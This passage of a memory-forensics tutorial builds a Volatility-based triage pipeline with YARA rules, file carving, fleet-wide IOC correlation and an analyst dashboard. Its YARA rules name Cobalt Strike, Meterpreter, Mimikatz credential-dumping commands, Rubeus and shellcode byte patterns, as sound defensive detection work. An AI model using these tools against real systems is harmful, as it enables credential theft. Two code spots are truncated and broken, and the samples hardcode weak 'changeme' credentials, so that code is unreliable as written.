""", (has_malfind, image_id))
cur.execute(
"UPDATE memory_images SET status='deep_complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Deep analysis complete for {hostname}: "
f"{len(malfind_records)} malfind regions")
extract_iocs.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Deep analysis failed for image {image_id}: {exc}")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='deep_failed' WHERE id=%s", (image_id,))
conn.commit()
raise self.retry(exc=exc, countdown=180)
@app.task(bind=True)
def extract_iocs(self, image_id: int) -> int:
"""Stage 4: Extract and enrich IOCs from analysis results."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Extracting IOCs for {hostname} (image {image_id})")
ioc_records = []
# Extract IP addresses from network connections
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT DISTINCT remote_addr, remote_port, pid, process_name
FROM network_connections
WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'
""", (image_id,))
for row in cur.fetchall():
remote_addr, port, pid, pname = row
# Filter RFC1918 addresses - external IPs are more interesting
if not any(remote_addr.startswith(r) for r in
['10.', '172.16.', '192.168.', '127.', '0.']):
ioc_records.append((
image_id, 'ip_address', remote_addr,
pid, pname, 'medium', 'netscan'
))
# Extract strings from malfind regions (URLs, domains, hashes)
# Run strings against each malfind region via bulk_extractor
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT pid, vad_start, vad_end, process_name
FROM malfind_results
WHERE image_id = %s AND risk_level IN ('CRITICAL','HIGH')
LIMIT 20
""", (image_id,))
high_risk_regions = cur.fetchall()
# Use Volatility strings plugin for URL extraction from memory
strings_result = subprocess.run([
VOL_CMD, '-f', image_path, '--renderer', 'json',
'windows.strings', '--pid',
','.join(str(r[0]) for r in high_risk_regions) if high_risk_regions else '0'
], capture_output=True, text=True, timeout=300)
# Extract URLs and domains from strings output
url_pattern = re.compile(r'https?://[a-zA-Z0-9./_?=&-]{10,200}')
domain_pattern = re.compile(r'\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b')
for url in url_pattern.findall(strings_result.stdout):
if not any(legit in url for legit in
['microsoft.com', 'windows.com', 'windowsupdate.com']):
ioc_records.append((image_id, 'url', url, None, None, 'medium', 'strings'))
if ioc_records:
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO iocs_extracted
(image_id, ioc_type, ioc_value, pid, process_name,
confidence, source_plugin)
VALUES %s
ON CONFLICT DO NOTHING
""", ioc_records)
conn.commit()
log.info(f"IOC extraction complete for {hostname}: {len(ioc_records)} IOCs")
generate_report.delay(image_id)
return image_id
except Exception as exc:
log.error(f"IOC extraction failed for image {image_id}: {exc}")
raise
@app.task(bind=True)
def generate_report(self, image_id: int) -> int:
"""Stage 5: Generate analyst-ready HTML and JSON reports."""
try:
with get_db() as conn:
with conn.cursor() as cur:
# Gather all results
cur.execute("""
SELECT m.hostname, m.image_path, m.image_size_gb, m.sha256,
m.acquired_at, m.os_version, m.tier,
t.process_count, t.network_conn_count,
t.suspicious_process_count, t.risk_score, t.has_malfind
FROM memory_images m
LEFT JOIN triage_results t ON t.image_id = m.id
WHERE m.id = %s
""", (image_id,))
meta = cur.fetchone()
cur.execute("""
SELECT pid, ppid, name, path, cmd_line, suspicious_reason
FROM process_list WHERE image_id = %s AND is_suspicious = TRUE
""", (image_id,))
suspicious_procs = cur.fetchall()
cur.execute("""
SELECT process_name, remote_addr, remote_port, state
FROM network_connections WHERE image_id = %s AND is_suspicious = TRUE
""", (image_id,))
suspicious_conns = cur.fetchall()
cur.execute("""
SELECT pid, process_name, protection, has_pe_header, entropy, risk_level
FROM malfind_results WHERE image_id = %s
ORDER BY risk_level
""", (image_id,))
malfind = cur.fetchall()
cur.execute("""
SELECT ioc_type, ioc_value, process_name, confidence
FROM iocs_extracted WHERE image_id = %s
""", (image_id,))
iocs = cur.fetchall()
hostname = meta[0]
risk_score = meta[10]
risk_label = (
'CRITICAL' if risk_score >= 50 else
'HIGH' if risk_score >= 20 else
'MEDIUM' if risk_score >= 5 else
'LOW'
)
# JSON report
report_data = {
'hostname': hostname,
'image_id': image_id,
'risk_score': risk_score,
'risk_label': risk_label,
'has_malfind': meta[11],
'suspicious_procs': len(suspicious_procs),
'suspicious_conns': len(suspicious_conns),
'ioc_count': len(iocs),
'iocs': [{'type': i[0], 'value': i[1], 'process': i[2]} for i in iocs],
'malfind_regions': [
{'pid': m[0], 'process': m[1], 'protection': m[2],
'has_pe': m[3], 'risk': m[5]}
for m in malfind
],
}
report_dir = Path(f'/srv/memory/reports/{hostname}')
report_dir.mkdir(parents=True, exist_ok=True)
json_path = report_dir / f'report_{image_id}.json'
with open(json_path, 'w') as f:
json.dump(report_data, f, indent=2, default=str)
with get_db() as conn:
with conn.cursor() as cur:
cur.execute(
"UPDATE memory_images SET status='complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Report generated for {hostname}: risk={risk_label} ({risk_score})")
if risk_label in ('CRITICAL', 'HIGH'):
log.warning(f"HIGH PRIORITY: {hostname} requires immediate analyst review")
return image_id
except Exception as exc:
log.error(f"Report generation failed for image {image_id}: {exc}")
raise
The image watcher: automatically triggering the pipeline
The pipeline tasks need to be triggered automatically when a new memory image lands in the collection directory. A filesystem watcher daemon monitors the landing zone and starts the processing chain as soon as an image file is detected and is not still being written.
## image_watcher.py - Filesystem watcher for automatic pipeline triggering
#!/usr/bin/env python3
"""
Watches the Velociraptor upload directory for new memory images.
Automatically triggers the processing pipeline when a new image lands.
"""
import time
import os
import re
import logging
import psycopg2
from pathlib import Path
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
# pip install watchdog
from pipeline import validate_image # Import Celery task
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s',
handlers=[
logging.FileHandler('/srv/memory/logs/watcher.log'),
logging.StreamHandler()
]
)
log = logging.getLogger(__name__)
WATCH_DIR = '/srv/memory/landing'
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
# Pattern matching Velociraptor-uploaded memory images
# Format: hostname_timestamp.raw or hostname_timestamp.zip
IMAGE_PATTERN = re.compile(r'^([a-zA-Z0-9_-]+)_(\d+)\.(raw|zip|dmp)$')
class MemoryImageHandler(FileSystemEventHandler):
def __init__(self):
self.processing = set()
def on_closed(self, event):
"""Triggered when a file write is complete (file handle closed)."""
if event.is_directory:
return
self._handle_new_file(event.src_path)
def on_created(self, event):
"""Fallback for systems where on_closed is not supported."""
if event.is_directory:
return
# Wait briefly and check if file is still being written
time.sleep(5)
path = Path(event.src_path)
if not path.exists():
return
# Check file is not growing (transfer complete)
size1 = path.stat().st_size
time.sleep(10)
size2 = path.stat().st_size
if size1 == size2:
self._handle_new_file(event.src_path)
def _handle_new_file(self, filepath: str):
path = Path(filepath)
if path.name in self.processing:
return
match = IMAGE_PATTERN.match(path.name)
if not match:
return
hostname = match.group(1)
timestamp = match.group(2)
log.info(f"New image detected: {path.name} from {hostname}")
self.processing.add(path.name)
try:
# Register in database
with psycopg2.connect(POSTGRES_URL) as conn:
with conn.cursor() as cur:
cur.execute("""
INSERT INTO memory_images (hostname, image_path, status)
VALUES (%s, %s, 'received')
ON CONFLICT DO NOTHING
RETURNING id
""", (hostname, str(path)))
row = cur.fetchone()
conn.commit()
if row:
image_id = row[0]
log.info(f"Registered image {image_id} for {hostname}, starting pipeline")
# Kick off the pipeline
validate_image.delay(image_id)
else:
log.warning(f"Image already registered: {path.name}")
except Exception as e:
log.error(f"Failed to register {path.name}: {e}")
self.processing.discard(path.name)
def main():
log.info(f"Starting image watcher on {WATCH_DIR}")
Path(WATCH_DIR).mkdir(parents=True, exist_ok=True)
handler = MemoryImageHandler()
observer = Observer()
observer.schedule(handler, WATCH_DIR, recursive=False)
observer.start()
log.info("Watcher running. Press Ctrl+C to stop.")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
if __name__ == '__main__':
main()
Systemd service for the watcher
## /etc/systemd/system/memory-watcher.service
[Unit]
Description=Memory Image Pipeline Watcher
After=network.target docker.service redis.service postgresql.service
Requires=docker.service
[Service]
Type=simple
User=analyst
WorkingDirectory=/srv/memory
ExecStart=/opt/vol3-env/bin/python3 /srv/memory/image_watcher.py
Restart=always
RestartSec=10
StandardOutput=append:/srv/memory/logs/watcher.log
StandardError=append:/srv/memory/logs/watcher.log
Environment=POSTGRES_URL=postgresql://analyst:changeme@localhost/memory_analysis
Environment=CELERY_BROKER_URL=redis://localhost:6379/0
[Install]
WantedBy=multi-user.target
## Enable and start the watcher
systemctl daemon-reload
systemctl enable memory-watcher
systemctl start memory-watcher
systemctl status memory-watcher
Building a Yara ruleset for memory scanning
Yara rules are the primary mechanism for identifying known malware families and attacker tooling in memory images. The pipeline already calls windows.vadyarascan against each image, but the ruleset it scans against needs to be maintained and compiled correctly to be useful. A poorly maintained Yara ruleset either generates excessive false positives that slow investigation or misses known malware because rules have not been updated. This section covers building a ruleset specifically for memory scanning rather than file scanning, which has different considerations.
Memory scanning Yara rules differ from file scanning rules in two important ways. First, you cannot rely on file-level indicators like filesize or hash since you are scanning a memory region, not a file. Second, strings appear decoded in memory even if they were encrypted or obfuscated on disk, which means memory rules can be simpler and more reliable than their file-based equivalents for many malware families.
## Yara rule structure for memory scanning
## Save to /srv/memory/yara_rules/
# rules/cobalt_strike.yar
rule CobaltStrike_Beacon_Config_Decoded {
meta:
description = "Detects decoded Cobalt Strike beacon configuration in memory"
author = "justruss"
date = "2026-01-01"
confidence = "high"
strings:
// BeaconType field prefix in decoded config
$beacon_cfg = { 00 01 00 01 00 00 00 ?? }
// Common C2 URI patterns in decoded beacon memory
$uri_pattern = "/updates" ascii wide
$uri_cdn = "/CDN/" ascii wide
// Sleep mask pattern common across CS versions
$sleep_mask = { C7 44 24 ?? 01 00 00 00 }
// Reflective loader signature
$ref_loader = "ReflectiveLoader" ascii
condition:
($ref_loader and 1 of ($uri_pattern, $uri_cdn))
or ($beacon_cfg and $sleep_mask)
}
rule CobaltStrike_SMB_Beacon {
meta:
description = "Detects Cobalt Strike SMB named pipe beacon in memory"
strings:
$pipe_msse = "\\\\.\\pipe\\MSSE-" wide ascii
$pipe_postex = "\\\\.\\pipe\\postex_" wide ascii
$pipe_msagnt = "\\\\.\\pipe\\msagent_" wide ascii
$pipe_status = "\\\\.\\pipe\\status_" wide ascii
condition:
any of them
}
# rules/meterpreter.yar
rule Meterpreter_Reflective_DLL {
meta:
description = "Detects Meterpreter reflective DLL in process memory"
strings:
$mz = { 4D 5A }
$ref_loader = "ReflectiveLoader" ascii
$meterpreter = "meterpreter" ascii nocase
$stdapi = "stdapi_" ascii
$priv = "priv_elevate" ascii
condition:
$mz at 0 and $ref_loader and 1 of ($meterpreter, $stdapi, $priv)
}
# rules/credential_tools.yar
rule Mimikatz_In_Memory {
meta:
description = "Detects Mimikatz variants loaded in process memory"
strings:
$mimikatz1 = "mimikatz" ascii wide nocase
$mimikatz2 = "sekurlsa::" ascii wide
$mimikatz3 = "lsadump::" ascii wide
$mimikatz4 = "kerberos::" ascii wide
$mimikatz5 = "privilege::debug" ascii wide
$wdigest = "wdigest.dll" ascii wide
$lsasrv = "lsasrv.dll" ascii wide
condition:
2 of ($mimikatz1, $mimikatz2, $mimikatz3, $mimikatz4, $mimikatz5)
or ($wdigest and $lsasrv and 1 of ($mimikatz1, $mimikatz2))
}
rule Rubeus_Kerberos_Tool {
meta:
description = "Detects Rubeus .NET Kerberos toolkit in memory"
strings:
$rubeus1 = "Rubeus" ascii wide
$asktgt = "asktgt" ascii wide
$kerberos = "kerberoast" ascii wide nocase
$asreproast = "asreproast" ascii wide nocase
$s4u = "s4u" ascii wide
condition:
$rubeus1 and 2 of ($asktgt, $kerberos, $asreproast, $s4u)
}
# rules/generic_suspicious.yar
rule RWX_PE_In_Anonymous_Memory {
meta:
description = "PE header in executable anonymous memory - reflective loading"
confidence = "medium"
strings:
$mz = { 4D 5A 90 00 }
$pe = { 50 45 00 00 }
condition:
$mz at 0 and $pe
}
rule Shellcode_Common_Preambles {
meta:
description = "Common shellcode entry patterns in executable memory"
strings:
// x64 NOP sled into shellcode
$nop_sled = { 90 90 90 90 90 90 90 90 FC 48 83 E4 F0 }
// Common x64 shellcode prologue
$x64_prolog = { FC 48 83 E4 F0 E8 C? 00 00 00 }
// Common WinExec shellcode pattern
$winexec = { 6A 01 68 63 6D 64 00 }
condition:
any of them
}
## Yara rule compilation and management script
## Run regularly to rebuild the combined ruleset
#!/usr/bin/env python3
"""
Compiles individual Yara rule files into a single compiled ruleset.
Validates rules before compilation to catch syntax errors.
Tests against known-clean samples to check for false positives.
"""
import yara
import os
import json
import logging
from pathlib import Path
from datetime import datetime
log = logging.getLogger(__name__)
RULES_DIR = Path('/srv/memory/yara_rules/rules')
COMPILED_OUT = Path('/srv/memory/yara_rules/combined.yar')
CLEAN_SAMPLES = Path('/srv/memory/yara_rules/clean_samples')
def compile_ruleset() -> bool:
"""Compile all .yar files into a single combined ruleset."""
rule_files = {}
errors = []
for yar_file in sorted(RULES_DIR.glob('*.yar')):
namespace = yar_file.stem
try:
# Test compile individually first
yara.compile(filepath=str(yar_file))
rule_files[namespace] = str(yar_file)
log.info(f" OK: {yar_file.name}")
except yara.SyntaxError as e:
log.error(f" SYNTAX ERROR in {yar_file.name}: {e}")
errors.append(str(yar_file.name))
if errors:
log.error(f"Compilation aborted: {len(errors)} files have syntax errors")
return False
# Compile combined ruleset
try:
combined = yara.compile(filepaths=rule_files)
combined.save(str(COMPILED_OUT))
log.info(f"Combined ruleset saved: {COMPILED_OUT}")
log.info(f"Total rules compiled: {len(rule_files)} files")
return True
except Exception as e:
log.error(f"Combined compilation failed: {e}")
return False
def test_against_clean_samples(compiled_path: str) -> int:
"""Test compiled ruleset against clean samples. Returns false positive count."""
if not CLEAN_SAMPLES.exists():
log.warning("No clean samples directory - skipping false positive test")
return 0
rules = yara.load(compiled_path)
fp_count = 0
for sample in CLEAN_SAMPLES.glob('*'):
if sample.is_file():
matches = rules.match(str(sample))
if matches:
log.warning(f"FALSE POSITIVE: {sample.name} matched {[m.rule for m in matches]}")
fp_count += 1
log.info(f"False positive check: {fp_count} hits in clean samples")
return fp_count
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s')
log.info(f"Compiling Yara ruleset from {RULES_DIR}")
if compile_ruleset():
fps = test_against_clean_samples(str(COMPILED_OUT))
if fps > 5:
log.warning(f"High false positive count ({fps}) - review rules before use")
else:
log.info("Ruleset ready for deployment")
else:
log.error("Ruleset compilation failed - keeping previous version")
Memory carving: recovering deleted files and artefacts
Memory carving is distinct from Volatility plugin analysis. Where Volatility works with the structured data in a memory image (process tables, VAD trees, network structures), carving treats the image as a raw byte stream and searches for known file signatures. This recovers files that were loaded into memory and may no longer be accessible through normal OS structures: documents opened and closed before the image was taken, executables that were loaded and unmapped, scripts that ran entirely in memory, and configuration files that were decrypted and used.
## Automated memory carving pipeline stage
## Integrates with the main Celery pipeline
#!/usr/bin/env python3
"""
Memory carving using bulk_extractor and foremost against memory images.
Focuses on security-relevant carving: executables, scripts, documents, certificates.
"""
import subprocess
import shutil
import json
import logging
from pathlib import Path
from typing import List, Dict
log = logging.getLogger(__name__)
# File types to carve - focused on security-relevant artefacts
FOREMOST_CONFIG = """
# Foremost config for memory forensics
# Focus on executable and document types
# Windows executables
exe y 4000000 \x4d\x5a
# DLL files (same signature as exe but worth carving separately)
dll y 4000000 \x4d\x5a
# PowerShell scripts (XML-based)
ps1 y 100000 Dict:
"""Run bulk_extractor and foremost against a memory image."""
output_path = Path(output_dir) / f'carved_{image_id}'
output_path.mkdir(parents=True, exist_ok=True)
results = {
'image_id': image_id,
'carved_files': {},
'bulk_extractor': {},
'interesting': [],
}
# ── bulk_extractor: extracts structured data ──────────────────────────────
# Much faster than foremost for structured extraction
bulk_out = output_path / 'bulk_extractor'
bulk_out.mkdir(exist_ok=True)
log.info(f"Running bulk_extractor on image {image_id}")
result = subprocess.run([
'bulk_extractor',
'-o', str(bulk_out),
# Scanners relevant to security investigations
'-e', 'email', # Email addresses
'-e', 'url', # URLs
'-e', 'domain', # Domain names
'-e', 'ip', # IP addresses
'-e', 'base64', # Base64 encoded data
'-e', 'net', # Network packets
'-e', 'winpe', # Windows PE files
'-e', 'pdf', # PDF documents
'-e', 'zip', # ZIP/Office archives
'-e', 'json', # JSON data (configs, beacons)
image_path
], capture_output=True, text=True, timeout=3600)
if result.returncode == 0:
# Parse bulk_extractor output files
for feat_file in bulk_out.glob('*.txt'):
if feat_file.stat().st_size == 0:
continue
feature_name = feat_file.stem
lines = feat_file.read_text(errors='replace').splitlines()
# Filter comment lines
entries = [l for l in lines if l and not l.startswith('#')]
results['bulk_extractor'][feature_name] = len(entries)
# Flag high-value findings
if feature_name == 'url' and entries:
for entry in entries[:100]: # First 100 URLs
parts = entry.split('\t')
if len(parts) >= 2:
url = parts[1]
# Flag non-Microsoft, non-CDN URLs
if url.startswith('http') and not any(
d in url for d in [
'microsoft.com', 'windows.com', 'google.com',
'cloudflare.com', 'akamai.com'
]
):
results['interesting'].append({
'type': 'url',
'value': url,
'source': 'bulk_extractor'
})
# ── foremost: carves file signatures ─────────────────────────────────────
foremost_out = output_path / 'foremost'
foremost_out.mkdir(exist_ok=True)
# Write custom config
config_file = output_path / 'foremost.conf'
config_file.write_text(FOREMOST_CONFIG)
log.info(f"Running foremost on image {image_id}")
result = subprocess.run([
'foremost',
'-c', str(config_file),
'-o', str(foremost_out),
'-i', image_path,
'-q' # quiet mode
], capture_output=True, text=True, timeout=3600)
# Count carved files by type
for type_dir in foremost_out.iterdir():
if type_dir.is_dir() and type_dir.name != 'audit.txt':
file_list = list(type_dir.glob('*'))
count = len(file_list)
results['carved_files'][type_dir.name] = count
# Flag carved PE files for Yara scanning
if type_dir.name in ('exe', 'dll') and count > 0:
results['interesting'].append({
'type': 'carved_pe',
'value': f"{count} PE files carved from memory",
'path': str(type_dir),
'source': 'foremost'
})
log.info(f"Carving complete for image {image_id}: "
f"{sum(results['carved_files'].values())} files carved")
return results
def scan_carved_pes(carved_dir: str, yara_rules_path: str) -> List[Dict]:
"""Run Yara against carved PE files to identify malware families."""
import yara
if not Path(yara_rules_path).exists():
log.warning("Yara rules not found - skipping carved PE scan")
return []
rules = yara.load(yara_rules_path)
matches = []
for pe_file in Path(carved_dir).rglob('*.exe'):
try:
hits = rules.match(str(pe_file))
if hits:
matches.append({
'file': str(pe_file),
'rules': [h.rule for h in hits],
'size': pe_file.stat().st_size
})
log.warning(f"YARA HIT in carved file: {pe_file.name} -> {[h.rule for h in hits]}")
except Exception as e:
log.debug(f"Yara scan failed for {pe_file}: {e}")
return matches
Cross-image IOC correlation: finding attacker infrastructure across the fleet
Individual memory image analysis tells you what is happening on one machine. Cross-image correlation tells you the full scope of an intrusion: which machines have seen the same C2 IP, which machines have the same injected code hash, which machines ran the same attacker tool at approximately the same time. This is where the PostgreSQL backend pays off: all analysis results from all images are in the same database, queryable together.
## cross_correlation.py - Fleet-wide IOC correlation analysis
#!/usr/bin/env python3
"""
Cross-image correlation engine.
Finds common IOCs, processes, and artefacts across all analysed memory images.
Produces a fleet-wide threat assessment showing attacker scope and pivot points.
"""
import psycopg2
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import List, Dict, Tuple
from collections import defaultdict
log = logging.getLogger(__name__)
POSTGRES_URL = 'postgresql://analyst:changeme@localhost/memory_analysis'
def get_db():
return psycopg2.connect(POSTGRES_URL)
def correlate_external_ips() -> List[Dict]:
"""Find external IP addresses seen in multiple memory images."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
nc.remote_addr,
nc.remote_port,
COUNT(DISTINCT nc.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname ORDER BY mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT nc.process_name) AS processes
FROM network_connections nc
JOIN memory_images mi ON mi.id = nc.image_id
WHERE
nc.remote_addr != ''
AND nc.remote_addr != '0.0.0.0'
AND nc.remote_addr NOT LIKE '10.%'
AND nc.remote_addr NOT LIKE '172.16.%'
AND nc.remote_addr NOT LIKE '192.168.%'
AND nc.remote_addr NOT LIKE '127.%'
AND mi.status = 'complete'
GROUP BY nc.remote_addr, nc.remote_port
HAVING COUNT(DISTINCT nc.image_id) >= 2
ORDER BY host_count DESC, nc.remote_addr
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'remote_ip': row[0],
'remote_port': row[1],
'host_count': row[2],
'hostnames': row[3],
'processes': row[4],
'severity': 'CRITICAL' if row[2] >= 5 else 'HIGH' if row[2] >= 2 else 'MEDIUM',
})
return results
def correlate_malfind_patterns() -> List[Dict]:
"""Find memory injection patterns seen across multiple hosts."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
mf.protection,
mf.has_pe_header,
mf.risk_level,
COUNT(DISTINCT mf.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT mf.process_name) AS processes,
AVG(mf.entropy) AS avg_entropy
FROM malfind_results mf
JOIN memory_images mi ON mi.id = mf.image_id
WHERE mi.status = 'complete'
GROUP BY mf.protection, mf.has_pe_header, mf.risk_level
HAVING COUNT(DISTINCT mf.image_id) >= 2
ORDER BY host_count DESC
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'protection': row[0],
'has_pe_header':row[1],
'risk_level': row[2],
'host_count': row[3],
'hostnames': row[4],
'processes': row[5],
'avg_entropy': float(row[6]) if row[6] else 0,
})
return results
def correlate_iocs() -> List[Dict]:
"""Find IOC values seen across multiple memory images."""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
ioc.ioc_type,
ioc.ioc_value,
COUNT(DISTINCT ioc.image_id) AS host_count,
ARRAY_AGG(DISTINCT mi.hostname) AS hostnames,
ARRAY_AGG(DISTINCT ioc.process_name) AS processes,
MIN(mi.acquired_at) AS first_seen,
MAX(mi.acquired_at) AS last_seen
FROM iocs_extracted ioc
JOIN memory_images mi ON mi.id = ioc.image_id
WHERE mi.status = 'complete'
GROUP BY ioc.ioc_type, ioc.ioc_value
HAVING COUNT(DISTINCT ioc.image_id) >= 2
ORDER BY host_count DESC, ioc.ioc_type
""")
rows = cur.fetchall()
results = []
for row in rows:
results.append({
'ioc_type': row[0],
'ioc_value': row[1],
'host_count': row[2],
'hostnames': row[3],
'processes': row[4],
'first_seen': str(row[5]),
'last_seen': str(row[6]),
})
return results
def find_lateral_movement_timeline() -> List[Dict]:
"""
Attempt to reconstruct lateral movement by correlating
process creation times across hosts.
Looks for the same attacker tool running on multiple hosts
within a short time window.
"""
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
WITH suspicious AS (
SELECT
pl.name,
pl.create_time,
mi.hostname,
pl.pid,
pl.cmd_line
FROM process_list pl
JOIN memory_images mi ON mi.id = pl.image_id
WHERE pl.is_suspicious = TRUE
AND pl.create_time IS NOT NULL
)
SELECT
s1.name,
s1.hostname AS first_host,
s1.create_time AS first_time,
s2.hostname AS second_host,
s2.create_time AS second_time,
EXTRACT(EPOCH FROM (s2.create_time - s1.create_time))/60 AS minutes_between
FROM suspicious s1
JOIN suspicious s2 ON
s1.name = s2.name
AND s1.hostname != s2.hostname
AND s2.create_time > s1.create_time
AND s2.create_time - s1.create_time Dict:
"""Generate the complete fleet-wide correlation report."""
log.info("Running fleet-wide cross-image correlation")
# Count completed images
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
COUNT(*) AS total,
SUM(CASE WHEN status='complete' THEN 1 ELSE 0 END) AS complete,
SUM(CASE WHEN status LIKE '%running%' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status LIKE '%failed%' THEN 1 ELSE 0 END) AS failed,
SUM(CASE WHEN risk_score >= 50 THEN 1 ELSE 0 END) AS critical_hosts
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
""")
fleet_stats = cur.fetchone()
shared_ips = correlate_external_ips()
shared_malfind = correlate_malfind_patterns()
shared_iocs = correlate_iocs()
lateral_mv = find_lateral_movement_timeline()
# Calculate overall threat level
critical_count = sum(1 for ip in shared_ips if ip['severity'] == 'CRITICAL')
overall_threat = (
'CRITICAL' if critical_count > 0 or fleet_stats[4] > 3 else
'HIGH' if len(shared_ips) > 0 or fleet_stats[4] > 0 else
'MEDIUM' if len(shared_iocs) > 0 else
'LOW'
)
report = {
'generated_at': datetime.now().isoformat(),
'overall_threat': overall_threat,
'fleet_stats': {
'total_images': fleet_stats[0],
'complete': fleet_stats[1],
'processing': fleet_stats[2],
'failed': fleet_stats[3],
'critical_hosts': fleet_stats[4],
},
'shared_c2_ips': shared_ips,
'shared_injection_patterns': shared_malfind,
'shared_iocs': shared_iocs,
'lateral_movement_indicators': lateral_mv,
'summary': (
f"Fleet analysis of {fleet_stats[0]} endpoints. "
f"Overall threat level: {overall_threat}. "
f"{len(shared_ips)} shared external IP(s), "
f"{fleet_stats[4]} critical host(s), "
f"{len(lateral_mv)} potential lateral movement indicator(s)."
)
}
# Save report
report_path = Path('/srv/memory/reports/fleet_correlation.json')
with open(report_path, 'w') as f:
json.dump(report, f, indent=2, default=str)
log.info(f"Fleet report saved to {report_path}")
log.info(f"Overall threat level: {overall_threat}")
if shared_ips:
log.warning(f"SHARED C2 IPs DETECTED across {len(shared_ips)} IP(s):")
for ip in shared_ips[:5]:
log.warning(f" {ip['remote_ip']}:{ip['remote_port']} on {ip['host_count']} hosts: {ip['hostnames']}")
return report
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
report = generate_fleet_report()
print(json.dumps(report, indent=2, default=str))
The analyst dashboard
Raw pipeline output in a PostgreSQL database and JSON files is not usable under incident pressure. Analysts need a single view that shows which images are processing, which have completed, which have high-risk findings, and the cross-image correlation results. A lightweight Flask dashboard served by the Docker Compose stack provides this without requiring a full SIEM deployment.
## dashboard/app.py - Flask analyst dashboard
from flask import Flask, render_template, jsonify, request
import psycopg2
import psycopg2.extras
import json
import os
from datetime import datetime
app = Flask(__name__)
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
def get_db():
conn = psycopg2.connect(POSTGRES_URL, cursor_factory=psycopg2.extras.RealDictCursor)
return conn
@app.route('/')
def index():
return render_template('dashboard.html')
@app.route('/api/fleet-status')
def fleet_status():
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
SELECT
mi.id, mi.hostname, mi.status, mi.tier,
mi.image_size_gb, mi.received_at, mi.sha256,
tr.risk_score, tr.suspicious_process_count,
tr.has_malfind, tr.network_conn_count,
CASE
WHEN tr.risk_score >= 50 THEN 'CRITICAL'
WHEN tr.risk_score >= 20 THEN 'HIGH'
WHEN tr.risk_score >= 5 THEN 'MEDIUM'
ELSE 'LOW'
END AS risk_label
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
ORDER BY tr.risk_score DESC NULLS LAST, mi.received_at DESC
""")
rows = cur.fetchall()
return jsonify([dict(r) for r in rows])
@app.route('/api/host/')
def host_detail(image_id):
with get_db() as conn:
with conn.cursor() as cur:
# Suspicious processes
cur.execute("""
SELECT pid, ppid, name, path, cmd_line, suspicious_reason
FROM process_list
WHERE image_id = %s AND is_suspicious = TRUE
ORDER BY pid
""", (image_id,))
suspicious_procs = [dict(r) for r in cur.fetchall()]
# Malfind regions
cur.execute("""
SELECT pid, process_name, protection, has_pe_header,
entropy, risk_level, yara_matches
FROM malfind_results
WHERE image_id = %s
ORDER BY risk_level, entropy DESC
""", (image_id,))
malfind = [dict(r) for r in cur.fetchall()]
# Network connections
cur.execute("""
SELECT pid, process_name, remote_addr, remote_port, state, is_suspicious
FROM network_connections
WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'
ORDER BY is_suspicious DESC, remote_port
""", (image_id,))
connections = [dict(r) for r in cur.fetchall()]
# IOCs
cur.execute("""
SELECT ioc_type, ioc_value, process_name, confidence
FROM iocs_extracted
WHERE image_id = %s
ORDER BY ioc_type
""", (image_id,))
iocs = [dict(r) for r in cur.fetchall()]
return jsonify({
'suspicious_processes': suspicious_procs,
'malfind_regions': malfind,
'network_connections': connections,
'iocs': iocs,
})
@app.route('/api/fleet-correlation')
def fleet_correlation():
"""Return cross-image correlation results."""
report_path = '/srv/memory/reports/fleet_correlation.json'
try:
with open(report_path) as f:
return jsonify(json.load(f))
except FileNotFoundError:
return jsonify({'error': 'Correlation report not yet generated'}), 404
@app.route('/api/trigger-correlation', methods=['POST'])
def trigger_correlation():
"""Manually trigger fleet correlation analysis."""
import subprocess
subprocess.Popen(['python3', '/srv/memory/cross_correlation.py'])
return jsonify({'status': 'triggered'})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=False)
## dashboard/templates/dashboard.html - Single-page analyst interface
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Memory Analysis Dashboard</title>
<style>
* { box-sizing: border-box; margin: 0; padding: 0; }
body { font-family: 'JetBrains Mono', monospace; background: #0f172a; color: #e2e8f0; font-size: 13px; }
.header { background: #1e2433; padding: 16px 24px; border-bottom: 1px solid #334155; display: flex; align-items: center; gap: 16px; }
.header h1 { font-size: 16px; color: #f59e0b; }
